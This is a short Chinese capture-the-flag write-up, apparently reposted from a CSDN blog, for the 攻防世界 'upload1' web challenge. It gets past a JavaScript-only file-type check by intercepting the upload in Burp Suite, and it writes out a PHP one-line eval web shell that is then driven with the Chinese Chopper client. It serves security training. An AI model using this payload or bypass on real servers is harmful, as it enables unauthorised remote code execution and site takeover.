攻防世界 web upload1 write up

资料:http://39.96.86.88/2020/04/03/文件上传绕过

  1. 查看源代码发现又js代码,只能上传jpg与png格式的文件。
    https://blog.csdn.net/YUK_103/article/details/103839927

REQUEST包含了GET,POST,COOKIE是一个整合命令
2. 新建一个1.txt,写入php一句话:<?php @eval($_REQUEST[‘c’]);?>,然后修改后缀为.png或.jpg。然后再上传途中burp suite抓包修改后缀为.php实现对文件格式要求的绕过。
在这里插入图片描述
在这里插入图片描述
3. 上传成功
在这里插入图片描述

  1. 菜刀连接得到flag
    在这里插入图片描述在这里插入图片描述
    在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_43478096/article/details/104783743